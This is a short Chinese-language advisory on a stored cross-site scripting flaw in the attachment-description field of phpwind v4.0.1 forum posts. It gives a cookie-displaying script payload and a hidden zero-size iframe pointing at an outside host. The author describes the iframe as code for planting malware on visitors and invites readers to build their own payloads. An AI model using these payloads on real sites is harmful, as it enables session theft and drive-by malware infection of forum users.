漏洞程度:高危
漏洞程序:phpwind v4.0.1最新免费版
漏洞描述:利用phpwind v4.0.1论坛的发贴附件上传中的附件描述处插入任意代码!
漏洞利用:
在phpwind v4.0.1发贴/回贴的附件上传处,有个附件描述,在此处插入脚本代码,比如插入:
以下是代码片段:
CODE:
<script>alert(document.cookie)</script>
如图1:
点击提交,发贴/回贴成功后,浏览该贴就会执行插入的代码,没有做过滤,此代码的作用是获取用户的COOKIE信息.看你怎么利用了,代码可以自己构造其它的,经测试,引号是被php过滤了的.结果如图2:
从上图查看源文件可以看出,所插入的代码原样呆在附件描述处,没做过滤!
浏览刚发/回的贴子,结果如下图3:
当然也可以插入框架脚本代码,即我们常说的挂马代码,如: 以下是代码片段:
CODE:
<iframe src=http://gingelly.xinwen365.com/index1.htm width=0 height=0>
结果也不用说啦!
官方对此漏洞已出补丁,请有此论坛的用户及时更新.芝麻 ET!
